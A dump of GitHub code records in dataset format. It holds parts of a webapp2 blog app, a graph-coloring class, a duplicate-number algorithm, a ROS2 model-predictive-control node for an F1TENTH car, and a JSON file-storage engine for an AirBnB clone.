self.redirect(\"/blog/login\")\n\n\napp = webapp2.WSGIApplication([(\"/\", MainPage),\n (\"/blog/signup\", Signup),\n (\"/blog/?\", BlogFront),\n (\"/blog/([0-9]+)\", PostPage),\n (\"/blog/newpost\", NewPost),\n (\"/blog/login\", Login),\n (\"/blog/logout\", Logout),\n (\"/blog/addwag\", AddWag),\n (\"/blog/removewag\", RemoveWag),\n (\"/blog/deletepost\", DeletePost),\n (\"/blog/editpost\", EditPost),\n (\"/blog/addcomment\", AddComment),\n (\"/blog/deletecomment\", DeleteComment),\n (\"/blog/editcomment\", EditComment),\n (\"/blog/savecomment\", SaveComment),\n (\"/blog/welcome\", WelcomeRedirect)\n ],\n debug=True)\n","repo_name":"rijarobinson/animal-stories","sub_path":"blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":21289,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"13003240275","text":"from random import randint\n\n\nclass Coloration():\n COLORS = [\"red\", \"green\", \"blue\"]\n\n def __init__(self, graphe):\n self.graphe = graphe\n self.couleurs = {}\n\n def random_coloration(self):\n couleurs = {}\n graph = self.graphe.get_graph()\n for node in graph:\n couleurs[node] = self.COLORS[randint(0, len(self.COLORS)-1)]\n return couleurs\n\n def is_color_ok(self, node):\n for voisin in self.graphe.get_voisin(node):\n if self.couleurs[node] == self.couleurs[voisin]:\n return False\n return True\n\n def verify(self):\n # print(\"Verification du graph\")\n incorrect_node = []\n for node in self.graphe.get_graph().keys():\n if not self.is_color_ok(node):\n # print(\"le graph n'est pas bon car le noeud\", node, \"est mal coloré\")\n incorrect_node += [node]\n return incorrect_node\n\n def change_color(self, node, color=\"random\"):\n if color == \"random\":\n previous_color = self.couleurs[node]\n while self.couleurs[node] == previous_color:\n self.couleurs[node] = self.COLORS[randint(\n 0, len(self.COLORS)-1)]\n else:\n self.couleurs[node] = color\n return self.couleurs[node]\n\n def is_colored(self, node):\n return node in self.couleurs\n\n def remove_color(self, node):\n if node in self.couleurs:\n del self.couleurs[node]\n","repo_name":"Heargo/cours-m2","sub_path":"complexite_algo/tp_2/src/classes/coloration.py","file_name":"coloration.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"4912099631","text":"#-*- coding:utf-8 -*-\n'''\n数组中重复的数字\n找出数组中重复的数字,在一个长度为n的数组nums里的所有数字都在0-n-1的范围内。数组中\n某些数字是重复的,但不知道有几个数字重复了,也不知道每个数字重复多少次。请找出数组��\n任意一个重复的数字\n\n解题思路:\n哈希表法,遍历数组,将第一次找到的元素放入哈希表中,然后第二次遍历到了,如果是相同元素\n就直接返回这个元素。\n'''\n\nclass Solution:\n def findRepeatNumber(self,num):\n hahdict = {}\n for i,element in enumerate(num):\n if hahdict.get(element):\n return element\n else:\n hahdict[element] = 1\n\n","repo_name":"15869546886/learngit","sub_path":"Algorithm/剑指offer/lcjz03.py","file_name":"lcjz03.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11398270672","text":"#!/usr/bin/env python3\nimport math\nfrom dataclasses import dataclass, field\n\nimport cvxpy\nimport numpy as np\nimport rclpy\nfrom rclpy.node import Node\nfrom ackermann_msgs.msg import AckermannDrive, AckermannDriveStamped\nfrom geometry_msgs.msg import Point\nfrom geometry_msgs.msg import PoseStamped\nfrom sensor_msgs.msg import LaserScan\nfrom nav_msgs.msg import Odometry\nfrom visualization_msgs.msg import Marker\nfrom visualization_msgs.msg import MarkerArray\n\nfrom utils import nearest_point\n\nfrom scipy.linalg import block_diag\nfrom scipy.sparse import block_diag, csc_matrix, diags\nfrom scipy.interpolate import splev, splprep\nfrom scipy.spatial.transform import Rotation as R\n# TODO CHECK: include needed ROS msg type headers and libraries\n\n\n@dataclass\nclass mpc_config:\n NXK: int = 4 # length of kinematic state vector: z = [x, y, v, yaw]\n NU: int = 2 # length of input vector: u = = [steering speed, acceleration]\n TK: int = 24 # finite time horizon length kinematic\n\n # ---------------------------------------------------\n # TODO: you may need to tune the following matrices\n Rk: list = field(\n default_factory=lambda: np.diag([0.01, 100.0])\n ) # input cost matrix, penalty for inputs - [accel, steering_speed]\n Rdk: list = field(\n default_factory=lambda: np.diag([0.01, 100.0])\n ) # input difference cost matrix, penalty for change of inputs - [accel, steering_speed]\n Qk: list = field(\n default_factory=lambda: np.diag([13.5, 13.5, 5.5, 13.0])\n ) # state error cost matrix, for the the next (T) prediction time steps [x, y, delta, v, yaw, yaw-rate, beta]\n Qfk: list = field(\n default_factory=lambda: np.diag([13.5, 13.5, 5.5, 13.0])\n ) # final state error matrix, penalty for the final state constraints: [x, y, delta, v, yaw, yaw-rate, beta]\n # ---------------------------------------------------\n\n N_IND_SEARCH: int = 20 # Search index number\n DTK: float = 0.05 # time step [s] kinematic\n dlk: float = 0.03 # dist step [m] kinematic\n LENGTH: float = 0.58 # Length of the vehicle [m]\n WIDTH: float = 0.31 # Width of the vehicle [m]\n WB: float = 0.33 # Wheelbase [m]\n MIN_STEER: float = -0.4189 # maximum steering angle [rad]\n MAX_STEER: float = 0.4189 # maximum steering angle [rad]\n MAX_DSTEER: float = np.deg2rad(180.0) # maximum steering speed [rad/s]\n MAX_SPEED: float = 1.0 # maximum speed [m/s]\n MIN_SPEED: float = 0.0 # minimum backward speed [m/s]\n MAX_ACCEL: float = 1.0 # maximum acceleration [m/ss]\n\n\n@dataclass\nclass State:\n x: float = 0.0\n y: float = 0.0\n delta: float = 0.0\n v: float = 0.0\n yaw: float = 0.0\n yawrate: float = 0.0\n beta: float = 0.0\n\nclass MPC(Node):\n \"\"\" \n Implement Kinematic MPC on the car\n This is just a template, you are free to implement your own node!\n \"\"\"\n def __init__(self):\n super().__init__('mpc_node')\n\n filename = \"sim_points.csv\" \n self.yaw_data = np.load('data.npz')\n\n # ROS subscribers and publishers\n # use the MPC as a tracker (similar to pure pursuit)\n self.pose_subscriber = self.create_subscription(Odometry, 'ego_racecar/odom', self.pose_callback, 1)\n self.drive_publisher = self.create_publisher(AckermannDriveStamped, 'drive',1)\n self.goal_points_publisher = self.create_publisher(MarkerArray, 'pp_goal_points',1)\n self.spline_publisher = self.create_publisher(Marker, 'pp_spline',1)\n self.mpc_path_publisher = self.create_publisher(Marker, 'mpc_spline',1)\n self.pp_goal_publisher = self.create_publisher(Marker, 'pp_goal_point',1)\n\n # TODO: get waypoints here\n self.waypoints = load_points(filename, scaler=1)\n spline_data, uout = splprep(self.waypoints.T, s=0, per=True)\n self.x_spline, self.y_spline = splev(np.linspace(0,1,1000), spline_data)\n self.vx , self.vy = splev(np.linspace(0,1,1000), spline_data, der=1)\n\n self.spline_velocity = (self.vx**2 + self.vy**2)**0.5\n # print(len(self.x_spline))\n self.pp_points_data = self.visualize_pp_goal_points()\n self.pp_spline_data = self.visualize_spline()\n\n #Publish Rviz Markers every 2 seconds\n self.timer = self.create_timer(2, self.publish_rviz_data)#Publish waypoints\n\n\n self.config = mpc_config()\n self.odelta_v = None\n self.odelta = None\n self.oa = None\n self.init_flag = 0\n\n # initialize MPC problem\n self.mpc_prob_init()\n\n def pose_callback(self, pose_msg):\n # TODO: extract pose from ROS msg\n # Find the current waypoint to track using methods mentioned in lecture\n current_position = pose_msg.pose.pose.position\n current_quat = pose_msg.pose.pose.orientation\n\n current_lin_vel = pose_msg.twist.twist.linear\n current_ang_vel = pose_msg.twist.twist.angular\n\n quaternion = [current_quat.x, current_quat.y, current_quat.z, current_quat.w]\n euler = (R.from_quat(quaternion)).as_euler('xyz', degrees=False)\n global_car_position = [current_position.x, current_position.y, current_position.z] # Current location of car in world frame\n\n # Calculate immediate goal on Pure Pursuit Trajectory\n spline_points = np.hstack((self.x_spline.reshape(-1,1), self.y_spline.reshape(-1,1), np.zeros_like(self.y_spline.reshape(-1,1))))\n\n\n\n # individual_rays = np.diff(spline_points)\n individual_rays = np.diff(np.roll(spline_points,5)-spline_points)\n\n\n ######### Calculate yaw at each point -->\n # unit_rays = individual_rays/np.reshape(np.linalg.norm(individual_rays,axis =1),(-1,1))\n # yaw_array = np.arccos(np.clip(np.dot(unit_rays, [1.0,0.0]), a_min=-1, a_max=1))\n ######### OR method 2 ->\n yaw_array = self.yaw_data['yaw'].flatten()\n\n # Calculate closest point on spline\n norm_array = np.linalg.norm(spline_points - global_car_position, axis = 1)\n closest_pt_idx = np.argmin(norm_array)\n self.visualize_pt(spline_points[closest_pt_idx])\n\n # Check if car is oriented opposite the spline array direction\n if(closest_pt_idx+10>(len(self.x_spline)-1)): idx = 10 \n else: idx = closest_pt_idx+10\n sample_point = global_2_local(quaternion, spline_points[idx], global_car_position)\n if sample_point[0]>0:\n arangeit = np.arange(len(self.x_spline))\n rollit = np.roll(arangeit, -closest_pt_idx)\n # print(rollit)\n else:\n arangeit = np.flip(np.arange(len(self.x_spline)))\n rollit = np.roll(arangeit, closest_pt_idx)\n \n spline_points = spline_points[rollit]\n self.spline_velocity = self.spline_velocity[rollit]\n yaw_array = yaw_array[rollit]\n\n vehicle_state = State()\n # print(vehicle_state.x)\n vehicle_state.x = current_position.x\n vehicle_state.y = current_position.y\n vehicle_state.yaw = euler[-1]\n if vehicle_state.yaw<0:\n vehicle_state.yaw = vehicle_state.yaw + 2*np.pi\n vehicle_state.v = (current_lin_vel.x**2+current_lin_vel.y**2+current_lin_vel.z**2)**0.5\n\n # TODO: Calculate the next reference trajectory for the next T steps\n # with current vehicle pose.\n # ref_x, ref_y, ref_yaw, ref_v are columns of self.waypoints\n ref_x = spline_points[:,0]\n ref_y = spline_points[:,1]\n ref_yaw = yaw_array\n print(vehicle_state.y)\n angle_flip_idx = np.where(ref_yaw<0)\n ref_yaw[angle_flip_idx] = ref_yaw[angle_flip_idx] + 2*np.pi\n print(\"ref_yaw[0] in deg: \",np.rad2deg(ref_yaw[0]))\n print(\"actual yaw in deg: \", np.rad2deg(euler[-1]))\n print(\" \")\n ref_v = self.spline_velocity\n ref_path = self.calc_ref_trajectory(vehicle_state, ref_x, ref_y, ref_yaw, ref_v)\n x0 = [vehicle_state.x, vehicle_state.y, vehicle_state.v, vehicle_state.yaw]\n\n # TODO: solve the MPC control problem\n (\n self.oa,\n self.odelta_v,\n self.ox,\n self.oy,\n oyaw,\n ov,\n state_predict,\n ) = self.linear_mpc_control(ref_path, x0, self.oa, self.odelta_v)\n self.mpc_spline_data = self.visualize_mpc_path()\n\n # TODO: publish drive message.\n steer_output = self.odelta_v[0]\n speed_output = vehicle_state.v + self.oa[0] * self.config.DTK\n\n msg = AckermannDriveStamped()\n # msg.drive.speed = 0.0\n msg.drive.speed = speed_output\n msg.drive.steering_angle = float(steer_output)\n self.drive_publisher.publish(msg)\n\n def mpc_prob_init(self):\n \"\"\"\n Create MPC quadratic optimization problem using cvxpy, solver: OSQP\n Will be solved every iteration for control.\n More MPC problem information here: https://osqp.org/docs/examples/mpc.html\n More QP example in CVXPY here: https://www.cvxpy.org/examples/basic/quadratic_program.html\n \"\"\"\n # Initialize and create vectors for the optimization problem\n # Vehicle State Vector\n self.xk = cvxpy.Variable(\n (self.config.NXK, self.config.TK + 1)\n )\n # Control Input vector\n self.uk = cvxpy.Variable(\n (self.config.NU, self.config.TK)\n )\n objective = 0.0 # Objective value of the optimization problem\n constraints = [] # Create constraints array\n\n # Initialize reference vectors\n self.x0k = cvxpy.Parameter((self.config.NXK,))\n self.x0k.value = np.zeros((self.config.NXK,))\n\n # Initialize reference trajectory parameter\n self.ref_traj_k = cvxpy.Parameter((self.config.NXK, self.config.TK + 1))\n self.ref_traj_k.value = np.zeros((self.config.NXK, self.config.TK + 1))\n\n # Initializes block diagonal form of R = [R, R, ..., R] (NU*T, NU*T)\n R_block = block_diag(tuple([self.config.Rk] * self.config.TK)) # (16,16)\n\n # Initializes block diagonal form of Rd = [Rd, ..., Rd] (NU*(T-1), NU*(T-1))\n Rd_block = block_diag(tuple([self.config.Rdk] * (self.config.TK - 1)))\n # Initializes block diagonal form of Q = [Q, Q, ..., Qf] (NX*T, NX*T)\n Q_block = [self.config.Qk] * (self.config.TK)\n Q_block.append(self.config.Qfk)\n Q_block = block_diag(tuple(Q_block)) # Shape (36, 36)\n\n # Formulate and create the finite-horizon optimal control problem (objective function)\n # The FTOCP has the horizon of T timesteps\n\n # --------------------------------------------------------\n # TODO: fill in the objectives here, you should be using cvxpy.quad_form() somehwhere\n # TODO: Objective part 1: Influence of the control inputs: Inputs u multiplied by the penalty R\n objective += cvxpy.quad_form(cvxpy.vec(self.uk), R_block)\n\n # TODO: Objective part 2: Deviation of the vehicle from the reference trajectory weighted by Q, including final Timestep T weighted by Qf\n objective += cvxpy.quad_form(cvxpy.vec(self.xk - self.ref_traj_k), Q_block)\n\n # TODO: Objective part 3: Difference from one control input to the next control input weighted by Rd\n objective += cvxpy.quad_form(cvxpy.vec(cvxpy.diff(self.uk, axis=1)), Rd_block)\n # --------------------------------------------------------\n\n # Constraints 1: Calculate the future vehicle behavior/states based on the vehicle dynamics model matrices\n # Evaluate vehicle Dynamics for next T timesteps\n A_block = []\n B_block = []\n C_block = []\n # init path to zeros\n path_predict = np.zeros((self.config.NXK, self.config.TK + 1))\n for t in range(self.config.TK):\n A, B, C = self.get_model_matrix(\n path_predict[2, t], path_predict[3, t], 0.0\n )\n A_block.append(A)\n B_block.append(B)\n C_block.extend(C)\n\n A_block = block_diag(tuple(A_block))\n B_block = block_diag(tuple(B_block))\n C_block = np.array(C_block)\n\n # [AA] Sparse matrix to CVX parameter for proper stuffing\n # Reference: https://github.com/cvxpy/cvxpy/issues/1159#issuecomment-718925710\n m, n = A_block.shape\n self.Annz_k = cvxpy.Parameter(A_block.nnz)\n data = np.ones(self.Annz_k.size)\n rows = A_block.row * n + A_block.col\n cols = np.arange(self.Annz_k.size)\n Indexer = csc_matrix((data, (rows, cols)), shape=(m * n, self.Annz_k.size))\n\n # Setting sparse matrix data\n self.Annz_k.value = A_block.data\n\n # Now we use this sparse version instead of the old A_ block matrix\n self.Ak_ = cvxpy.reshape(Indexer @ self.Annz_k, (m, n), order=\"C\")\n\n # Same as A\n m, n = B_block.shape\n self.Bnnz_k = cvxpy.Parameter(B_block.nnz)\n data = np.ones(self.Bnnz_k.size)\n rows = B_block.row * n + B_block.col\n cols = np.arange(self.Bnnz_k.size)\n Indexer = csc_matrix((data, (rows, cols)), shape=(m * n, self.Bnnz_k.size))\n self.Bk_ = cvxpy.reshape(Indexer @ self.Bnnz_k, (m, n), order=\"C\")\n self.Bnnz_k.value = B_block.data\n\n # No need for sparse matrices for C as most values are parameters\n self.Ck_ = cvxpy.Parameter(C_block.shape)\n self.Ck_.value = C_block\n\n # -------------------------------------------------------------\n # TODO: Constraint part 1:\n # Add dynamics constraints to the optimization problem\n # This constraint should be based on a few variables:\n # self.xk, self.Ak_, self.Bk_, self.uk, and self.Ck_\n constraints += [cvxpy.vec(self.xk[:, 1:]) == self.Ak_ @ cvxpy.vec(self.xk[:, :-1]) + self.Bk_ @ cvxpy.vec(self.uk) + (self.Ck_)]\n\n # TODO: Constraint part 2:\n # Add constraints on steering, change in steering angle\n # cannot exceed steering angle speed limit. Should be based on:\n # self.uk, self.config.MAX_DSTEER, self.config.DTK\n constraints += [cvxpy.abs(cvxpy.diff(self.uk[1, :]))/self.config.DTK<=self.config.MAX_DSTEER]\n\n # TODO: Constraint part 3:\n # Add constraints on upper and lower bounds of states and inputs\n # and initial state constraint, should be based on:\n # self.xk, self.x0k, self.config.MAX_SPEED, self.config.MIN_SPEED,\n # self.uk, self.config.MAX_ACCEL, self.config.MAX_STEER\n constraints += [self.xk[:,0]==self.x0k]\n \n constraints += [self.xk[2,:]>=self.config.MIN_SPEED]\n constraints += [self.xk[2,:]<=self.config.MAX_SPEED]\n\n constraints += [cvxpy.abs(self.uk[0,:])<=self.config.MAX_ACCEL]\n constraints += [cvxpy.abs(self.uk[1,:])<=self.config.MAX_STEER]\n # -------------------------------------------------------------\n\n # Create the optimization problem in CVXPY and setup the workspace\n # Optimization goal: minimize the objective function\n self.MPC_prob = cvxpy.Problem(cvxpy.Minimize(objective), constraints)\n\n def calc_ref_trajectory(self, state, cx, cy, cyaw, sp):\n \"\"\"\n calc referent trajectory ref_traj in T steps: [x, y, v, yaw]\n using the current velocity, calc the T points along the reference path\n :param cx: Course X-Position\n :param cy: Course y-Position\n :param cyaw: Course Heading\n :param sp: speed profile\n :dl: distance step\n :pind: Setpoint Index\n :return: reference trajectory ref_traj, reference steering angle\n \"\"\"\n\n # Create placeholder Arrays for the reference trajectory for T steps\n ref_traj = np.zeros((self.config.NXK, self.config.TK + 1))\n ncourse = len(cx)\n\n # Find nearest index/setpoint from where the trajectories are calculated\n _, _, _, ind = nearest_point(np.array([state.x, state.y]), np.array([cx, cy]).T)\n\n # Load the initial parameters from the setpoint into the trajectory\n ref_traj[0, 0] = cx[ind]\n ref_traj[1, 0] = cy[ind]\n ref_traj[2, 0] = sp[ind]\n ref_traj[3, 0] = cyaw[ind]\n\n # based on current velocity, distance traveled on the ref line between time steps\n travel = abs(state.v) * self.config.DTK\n dind = travel / self.config.dlk\n ind_list = int(ind) + np.insert(\n np.cumsum(np.repeat(dind, self.config.TK)), 0, 0\n ).astype(int)\n ind_list[ind_list >= ncourse] -= ncourse\n ref_traj[0, :] = cx[ind_list]\n ref_traj[1, :] = cy[ind_list]\n ref_traj[2, :] = sp[ind_list]\n cyaw[cyaw - state.yaw > 4.5] = np.abs(\n cyaw[cyaw - state.yaw > 4.5] - (2 * np.pi)\n )\n cyaw[cyaw - state.yaw < -4.5] = np.abs(\n cyaw[cyaw - state.yaw < -4.5] + (2 * np.pi)\n )\n ref_traj[3, :] = cyaw[ind_list]\n\n return ref_traj\n\n def predict_motion(self, x0, oa, od, xref):\n path_predict = xref * 0.0\n for i, _ in enumerate(x0):\n path_predict[i, 0] = x0[i]\n\n state = State(x=x0[0], y=x0[1], yaw=x0[3], v=x0[2])\n for (ai, di, i) in zip(oa, od, range(1, self.config.TK + 1)):\n state = self.update_state(state, ai, di)\n path_predict[0, i] = state.x\n path_predict[1, i] = state.y\n path_predict[2, i] = state.v\n path_predict[3, i] = state.yaw\n\n return path_predict\n\n def update_state(self, state, a, delta):\n\n # input check\n if delta >= self.config.MAX_STEER:\n delta = self.config.MAX_STEER\n elif delta <= -self.config.MAX_STEER:\n delta = -self.config.MAX_STEER\n\n state.x = state.x + state.v * math.cos(state.yaw) * self.config.DTK\n state.y = state.y + state.v * math.sin(state.yaw) * self.config.DTK\n state.yaw = (\n state.yaw + (state.v / self.config.WB) * math.tan(delta) * self.config.DTK\n )\n state.v = state.v + a * self.config.DTK\n\n if state.v > self.config.MAX_SPEED:\n state.v = self.config.MAX_SPEED\n elif state.v < self.config.MIN_SPEED:\n state.v = self.config.MIN_SPEED\n\n return state\n\n def get_model_matrix(self, v, phi, delta):\n \"\"\"\n Calc linear and discrete time dynamic model-> Explicit discrete time-invariant\n Linear System: Xdot = Ax +Bu + C\n State vector: x=[x, y, v, yaw]\n :param v: speed\n :param phi: heading angle of the vehicle\n :param delta: steering angle: delta_bar\n :return: A, B, C\n \"\"\"\n\n # State (or system) matrix A, 4x4\n A = np.zeros((self.config.NXK, self.config.NXK))\n A[0, 0] = 1.0\n A[1, 1] = 1.0\n A[2, 2] = 1.0\n A[3, 3] = 1.0\n A[0, 2] = self.config.DTK * math.cos(phi)\n A[0, 3] = -self.config.DTK * v * math.sin(phi)\n A[1, 2] = self.config.DTK * math.sin(phi)\n A[1, 3] = self.config.DTK * v * math.cos(phi)\n A[3, 2] = self.config.DTK * math.tan(delta) / self.config.WB\n\n # Input Matrix B; 4x2\n B = np.zeros((self.config.NXK, self.config.NU))\n B[2, 0] = self.config.DTK\n B[3, 1] = self.config.DTK * v / (self.config.WB * math.cos(delta) ** 2)\n\n C = np.zeros(self.config.NXK)\n C[0] = self.config.DTK * v * math.sin(phi) * phi\n C[1] = -self.config.DTK * v * math.cos(phi) * phi\n C[3] = -self.config.DTK * v * delta / (self.config.WB * math.cos(delta) ** 2)\n\n return A, B, C\n\n def mpc_prob_solve(self, ref_traj, path_predict, x0):\n self.x0k.value = x0\n\n A_block = []\n B_block = []\n C_block = []\n for t in range(self.config.TK):\n A, B, C = self.get_model_matrix(\n path_predict[2, t], path_predict[3, t], 0.0\n )\n A_block.append(A)\n B_block.append(B)\n C_block.extend(C)\n\n A_block = block_diag(tuple(A_block))\n B_block = block_diag(tuple(B_block))\n C_block = np.array(C_block)\n\n self.Annz_k.value = A_block.data\n self.Bnnz_k.value = B_block.data\n self.Ck_.value = C_block\n\n self.ref_traj_k.value = ref_traj\n\n # Solve the optimization problem in CVXPY\n # Solver selections: cvxpy.OSQP; cvxpy.GUROBI\n self.MPC_prob.solve(solver=cvxpy.OSQP, verbose=False, warm_start=True)\n\n if (\n self.MPC_prob.status == cvxpy.OPTIMAL\n or self.MPC_prob.status == cvxpy.OPTIMAL_INACCURATE\n ):\n ox = np.array(self.xk.value[0, :]).flatten()\n oy = np.array(self.xk.value[1, :]).flatten()\n ov = np.array(self.xk.value[2, :]).flatten()\n oyaw = np.array(self.xk.value[3, :]).flatten()\n oa = np.array(self.uk.value[0, :]).flatten()\n odelta = np.array(self.uk.value[1, :]).flatten()\n\n else:\n print(\"Error: Cannot solve mpc..\")\n oa, odelta, ox, oy, oyaw, ov = None, None, None, None, None, None\n\n return oa, odelta, ox, oy, oyaw, ov\n\n def linear_mpc_control(self, ref_path, x0, oa, od):\n \"\"\"\n MPC control with updating operational point iteratively\n :param ref_path: reference trajectory in T steps\n :param x0: initial state vector\n :param oa: acceleration of T steps of last time\n :param od: delta of T steps of last time\n \"\"\"\n\n if oa is None or od is None:\n oa = [0.0] * self.config.TK\n od = [0.0] * self.config.TK\n\n # Call the Motion Prediction function: Predict the vehicle motion for x-steps\n path_predict = self.predict_motion(x0, oa, od, ref_path)\n poa, pod = oa[:], od[:]\n\n # Run the MPC optimization: Create and solve the optimization problem\n mpc_a, mpc_delta, mpc_x, mpc_y, mpc_yaw, mpc_v = self.mpc_prob_solve(\n ref_path, path_predict, x0\n )\n\n return mpc_a, mpc_delta, mpc_x, mpc_y, mpc_yaw, mpc_v, path_predict\n\n ########################### VISUALIZATION ############################\n def visualize_pt(self, point):\n array_values=MarkerArray()\n\n message = Marker()\n message.header.frame_id=\"map\"\n message.header.stamp = self.get_clock().now().to_msg()\n message.type= Marker.SPHERE\n message.action = Marker.ADD\n message.id=0\n message.pose.orientation.x=0.0\n message.pose.orientation.y=0.0\n message.pose.orientation.z=0.0\n message.pose.orientation.w=1.0\n message.scale.x=0.2\n message.scale.y=0.2\n message.scale.z=0.2\n message.color.a=1.0\n message.color.r=1.0\n message.color.b=1.0\n message.color.g=0.0\n message.pose.position.x=float(point[0])\n message.pose.position.y=float(point[1])\n message.pose.position.z=0.0\n message.lifetime.nanosec=int(1e8)\n\n array_values.markers.append(message)\n self.pp_goal_publisher.publish(message)\n \n def visualize_pp_goal_points(self):\n array_values=MarkerArray()\n\n for i in range(len(self.waypoints)):\n message = Marker()\n message.header.frame_id=\"map\"\n message.header.stamp = self.get_clock().now().to_msg()\n message.type= Marker.SPHERE\n message.action = Marker.ADD\n message.id=i\n message.pose.orientation.x=0.0\n message.pose.orientation.y=0.0\n message.pose.orientation.z=0.0\n message.pose.orientation.w=1.0\n message.scale.x=0.2\n message.scale.y=0.2\n message.scale.z=0.2\n message.color.a=1.0\n message.color.r=1.0\n message.color.b=0.0\n message.color.g=0.0\n message.pose.position.x=float(self.waypoints[i,0])\n message.pose.position.y=float(self.waypoints[i,1])\n message.pose.position.z=0.0\n array_values.markers.append(message)\n return array_values\n \n def visualize_spline(self):\n\n message = Marker()\n message.header.frame_id=\"map\"\n message.type= Marker.LINE_STRIP\n message.action = Marker.ADD\n message.pose.position.x= 0.0\n message.pose.position.y= 0.0\n message.pose.position.z=0.0\n message.pose.orientation.x=0.0\n message.pose.orientation.y=0.0\n message.pose.orientation.z=0.0\n message.pose.orientation.w=1.0\n message.scale.x=0.05\n\n for i in range(len(self.x_spline)-1):\n clr = 1 - (self.spline_velocity[i]-np.min(self.spline_velocity))/(np.max(self.spline_velocity) - np.min(self.spline_velocity))\n message.color.a=1.0\n message.color.r=clr\n message.color.b=clr\n message.color.g=clr\n\n message.id=i\n message.header.stamp = self.get_clock().now().to_msg()\n\n point1 = Point()\n point1.x = float(self.x_spline[i])\n point1.y = float(self.y_spline[i])\n point1.z = 0.0\n message.points.append(point1)\n\n point2 = Point()\n point2.x = float(self.x_spline[i+1])\n point2.y = float(self.y_spline[i+1])\n point2.z = 0.0\n message.points.append(point2)\n self.spline_publisher.publish(message)\n\n return message\n \n def visualize_mpc_path(self):\n\n message = Marker()\n message.header.frame_id=\"map\"\n message.type= Marker.LINE_STRIP\n message.action = Marker.ADD\n message.pose.position.x= 0.0\n message.pose.position.y= 0.0\n message.pose.position.z=0.0\n message.pose.orientation.x=0.0\n message.pose.orientation.y=0.0\n message.pose.orientation.z=0.0\n message.pose.orientation.w=1.0\n message.scale.x=0.05\n message.color.r=1.0\n message.color.b=0.0\n message.color.g=0.0\n message.lifetime.nanosec=int(1e8)\n\n\n for i in range(len(self.ox)-1):\n message.color.a=1.0\n\n message.id=i\n message.header.stamp = self.get_clock().now().to_msg()\n\n point1 = Point()\n point1.x = float(self.ox[i])\n point1.y = float(self.oy[i])\n point1.z = 0.0\n message.points.append(point1)\n\n point2 = Point()\n point2.x = float(self.ox[i+1])\n point2.y = float(self.oy[i+1])\n point2.z = 0.0\n message.points.append(point2)\n self.spline_publisher.publish(message)\n return message\n \n def publish_rviz_data(self):\n self.goal_points_publisher.publish(self.pp_points_data)\n self.spline_publisher.publish(self.pp_spline_data)\n self.mpc_path_publisher.publish(self.mpc_spline_data)\n\n ########################### VISUALIZATION ############################\n \ndef global_2_local(quaternion, pt_w, T_c_w):\n # Transform goal point to vehicle frame of reference\n rot = (R.as_matrix(R.from_quat(quaternion)))\n pt_c = (np.array(pt_w) - np.array(T_c_w))@rot\n \"\"\" \n # Alternate Method \n H_global2car = np.zeros([4, 4]) #rigid body transformation from the global frame of referce to the car\n H_global2car[3, 3] = 1\n current_rotation_matrix = R.from_quat(np.array([current_quat.x,current_quat.y,current_quat.z,current_quat.w])).as_matrix()\n H_global2car[0:3, 0:3] = np.array(current_rotation_matrix)\n H_global2car[0:3, 3] = np.array([current_position.x, current_position.y, current_position.z])\n\n # Calculate point\n goal_point_global = np.append(pt_w, 1).reshape(4, 1)\n pt_c = np.linalg.inv(H_global2car) @ goal_point_global\n \"\"\"\n return pt_c\n\ndef load_points(file, scaler=10):\n # Open csv and read the waypoint data\n with open(file, 'r') as f:\n lines = (line for line in f if not line.startswith('#'))\n data = np.loadtxt(lines, delimiter=',', dtype=float)\n points = data / scaler\n\n return points\n \ndef main(args=None):\n rclpy.init(args=args)\n print(\"MPC Initialized\")\n mpc_node = MPC()\n rclpy.spin(mpc_node)\n\n mpc_node.destroy_node()\n rclpy.shutdown()\n\nif __name__ == '__main__':\n main()\n","repo_name":"architnh/f1tenth_mpc","sub_path":"mpc/mpc/mpc_node.py","file_name":"mpc_node.py","file_ext":"py","file_size_in_byte":28160,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"37470347790","text":"#!/usr/bin/python3\n'''\n Define class FileStorage\n'''\nimport json\nimport models\n\n\nclass FileStorage:\n '''\n Serializes instances to JSON file and deserializes to JSON file.\n '''\n __file_path = \"file.json\"\n __objects = {}\n\n def all(self, cls=None):\n '''\n Return the dictionary if cls == None, else return a dictionary of\n all classes of type cls\n '''\n objs = {}\n if cls is None:\n return self.__objects\n for key, val in FileStorage.__objects.items():\n if cls.__name__ == val.__class__.__name__:\n objs[key] = val\n return objs\n\n def new(self, obj):\n '''\n Set in __objects the obj with key .id\n Aguments:\n obj : An instance object.\n '''\n key = str(obj.__class__.__name__) + \".\" + str(obj.id)\n value_dict = obj\n FileStorage.__objects[key] = value_dict\n\n def save(self):\n '''\n Serializes __objects attribute to JSON file.\n '''\n objects_dict = {}\n for key, val in FileStorage.__objects.items():\n objects_dict[key] = val.to_dict()\n\n with open(FileStorage.__file_path, mode='w', encoding=\"UTF8\") as fd:\n json.dump(objects_dict, fd)\n\n def reload(self):\n '''\n Deserializes the JSON file to __objects.\n '''\n try:\n with open(FileStorage.__file_path, encoding=\"UTF8\") as fd:\n objects = json.load(fd)\n for key, val in objects.items():\n class_name = val[\"__class__\"]\n class_name = models.classes[class_name]\n if \"id\" in val:\n obj_id = val[\"id\"]\n new = class_name(**val)\n key = str(class_name.__name__) + '.' + str(new.id)\n FileStorage.__objects[key] = new\n except FileNotFoundError:\n pass\n\n def delete(self, obj=None):\n '''\n Deletes obj from __objects if it is there\n '''\n if not obj:\n return\n key = str(obj.__class__.__name__) + \".\" + str(obj.id)\n if key in FileStorage.__objects:\n del FileStorage.__objects[key]\n self.save()\n\n def close(self):\n '''\n Deserializes JSON file to objects\n '''\n self.reload()\n","repo_name":"Kingswaysales/AirBnB_clone_v2","sub_path":"models/engine/file_storage.py","file_name":"file_storage.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8382603069","text":"# -*- coding: utf-8 -*-\r\n\r\nimport pickle as pkl\r\nimport numpy as np\r\nimport numpy.linalg as nplinalg\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.colors import LogNorm\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nfrom sklearn import mixture\r\nfrom 